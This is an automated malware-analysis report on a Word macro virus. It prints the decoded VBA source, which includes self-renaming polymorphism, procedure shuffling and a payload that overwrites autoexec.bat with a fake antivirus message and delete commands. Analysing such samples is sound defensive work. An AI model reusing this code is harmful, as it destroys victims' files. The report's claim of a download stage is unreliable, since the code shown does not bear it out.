Verdict: MALICIOUS (Risk Score: 140)

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment

Malware Insights
The sample is a legacy Word document containing a VBA macro that exhibits obfuscation techniques. The macro's 'FileSaveAs' subroutine is triggered by the 'Document_Open' event, indicating an attempt to execute malicious code upon opening. The presence of 'Win.Trojan.Psycho-3' in the ClamAV detection further supports its malicious nature. The macro's obfuscation makes it difficult to determine the exact payload, but its structure suggests it is designed to download and execute a second-stage payload.
Heuristics (4)

- ClamAV: Win.Trojan.Psycho-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Psycho-3
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 39075 bytes |

SHA-256: bd5771a07f67dbd9703b94733741ca0da56de6840a095ed6abf5ccdd66a53a1b

Preview script (first 1,000 lines of the extracted script; line breaks restored from the flattened extraction, analyst comments added where the Chr() chains decode unambiguously):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ExitWindowsEx Lib "User32" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long
' ZZ: polymorphic identifier renaming. Every name in the Blah list is replaced in the
' source text MMM by a random 3-9 letter string, so each generation has new identifiers.
Private Function ZZ(MMM)
Randomize: On Error Resume Next
Blah = "AA BB CC DD EEE ZZ MMM Blah BoB BoBby SDH SDH2 HH NtCode AdCode XX RRR YY "
Do
SDH2 = Left(Blah, InStr(Blah, Chr(32)) - 1): Blah = Mid(Blah, InStr(Blah, Chr(32)) + 1)
YY = Int(Rnd * 7) + 2
BoBby = Chr((Int(Rnd * 25) + 65))
For XX = 1 To YY: BoBby = BoBby + Chr((Int(Rnd * 25) + 65)): Next XX
Do
SDH = InStr(SDH + 1, LCase(MMM), LCase(SDH2))
If SDH Then MMM = Mid(MMM, 1, (SDH - 1)) & BoBby & Mid(MMM, (SDH + Len(SDH2)))
Loop While SDH
Loop While Blah <> ""
ZZ = MMM
End Function
' EEE: reads its own module source via VBProject.VBComponents(1).CodeModule, splits it
' into procedures and returns them in a random order (procedure shuffling).
Private Function EEE(HH, XX)
Dim EEE22(99), EEE23(99)
Set ourEEE = ThisDocument.VBProject.VBComponents(1).CodeModule
For i = 1 To HH: curEEE = tmpEEE
tmpEEE = ourEEE.ProcOfLine(i, 1)
If curEEE <> tmpEEE Then y = y + 1
EEE22(y) = EEE22(y) & ourEEE.lines(i, 1) & vbCr
Next i
For x = 1 To XX
EEE22(x) = Left(EEE22(x), Len(EEE22(x)) - 1)
c22 = 0: c23 = 0: c24 = Int(Rnd * (XX - x) + 1)
While c22 < c24
If EEE23(c23 + 1) = "" Then c22 = c22 + 1
c23 = c23 + 1
Wend
EEE23(c23) = x
Next x
For i = 1 To XX
EEE = EEE & EEE22(EEE23(i)) & vbCr
Next i
EEE = Left(EEE, Len(EEE) - 1)
End Function
' FileSaveAs: intercepts Word's built-in File > Save As command, then shows the real dialog.
Private Sub FileSaveAs()
Dim XX As Integer, YY As Integer: Randomize: On Error Resume Next
XX = Int(Rnd * 92) + 30: YY = Int(Rnd * 92) + 30: Dialogs(wdDialogFileSaveAs).Show
End Sub
' CC: payload. The Chr() chains build strings character by character to evade string scanning.
Private Sub CC()
' h$ decodes to "c:\autoexec.bat"
On Error Resume Next: h$ = Chr(99) & Chr(58) & Chr(92) & Chr(97) & Chr(117) & Chr(116) & Chr(111) & Chr(101) & Chr(120) & Chr(101) & Chr(99) & Chr(46) & Chr(98) & Chr(97) & Chr(116)
Open h$ For Output As #1
' OO$ & PP$ & QQ$ decode to "REM - This section put in by Windows, Windows will no longer start up -" CRLF "REM - Please Do Not Remove -"
OO$ = Chr(82) & Chr(69) & Chr(77) & Chr(32) & Chr(45) & Chr(32) & Chr(84) & Chr(104) & Chr(105) & Chr(115) & Chr(32) & Chr(115) & Chr(101) & Chr(99) & Chr(116) & Chr(105) & Chr(111) & Chr(110) & Chr(32) & Chr(112) & Chr(117) & Chr(116) & Chr(32) & Chr(105) & Chr(110) & Chr(32) & Chr(98) & Chr(121) & Chr(32) & Chr(87) & Chr(105) & Chr(110) & Chr(100) & Chr(111) & Chr(119) & Chr(115) & Chr(44)
PP$ = Chr(32) & Chr(87) & Chr(105) & Chr(110) & Chr(100) & Chr(111) & Chr(119) & Chr(115) & Chr(32) & Chr(119) & Chr(105) & Chr(108) & Chr(108) & Chr(32) & Chr(110) & Chr(111) & Chr(32) & Chr(108) & Chr(111) & Chr(110) & Chr(103) & Chr(101) & Chr(114) & Chr(32) & Chr(115) & Chr(116) & Chr(97) & Chr(114) & Chr(116) & Chr(32) & Chr(117) & Chr(112) & Chr(32) & Chr(45) & Chr(13) & Chr(10) & Chr(82) & Chr(69) & Chr(77) & Chr(32) & Chr(45) & Chr(32) & Chr(80) & Chr(108) & Chr(101) & Chr(97) & Chr(115) & Chr(101) & Chr(32) & Chr(68)
QQ$ = Chr(111) & Chr(32) & Chr(78) & Chr(111) & Chr(116) & Chr(32) & Chr(82) & Chr(101) & Chr(109) & Chr(111) & Chr(118) & Chr(101) & Chr(32) & Chr(45)
YY$ = OO$ & PP$ & QQ$: Print #1, YY$
' OO$ & PP$ decode to "@echo off" CRLF "echo You Anti-Virus software will now check you system..."
OO$ = Chr(64) & Chr(101) & Chr(99) & Chr(104) & Chr(111) & Chr(32) & Chr(111) & Chr(102) & Chr(102) & Chr(13) & Chr(10) & Chr(101) & Chr(99) & Chr(104) & Chr(111) & Chr(32) & Chr(89) & Chr(111) & Chr(117) & Chr(32) & Chr(65) & Chr(110) & Chr(116) & Chr(105) & Chr(45) & Chr(86) & Chr(105) & Chr(114) & Chr(117) & Chr(115) & Chr(32) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(119) & Chr(97) & Chr(114) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(108) & Chr(108) & Chr(32) & Chr(110) & Chr(111) & Chr(119) & Chr(32)
PP$ = Chr(99) & Chr(104) & Chr(101) & Chr(99) & Chr(107) & Chr(32) & Chr(121) & Chr(111) & Chr(117) & Chr(32) & Chr(115) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(46) & Chr(46) & Chr(46)
YY$ = OO$ & PP$: Print #1, YY$
' The next chain starts with "del c:\pr" before the preview is cut off
OO$ = Chr(100) & Chr(101) & Chr(108) & Chr(32) & Chr(99) & Chr(58) & Chr(92) & Chr(112) & Chr(114) & C ... (truncated)
```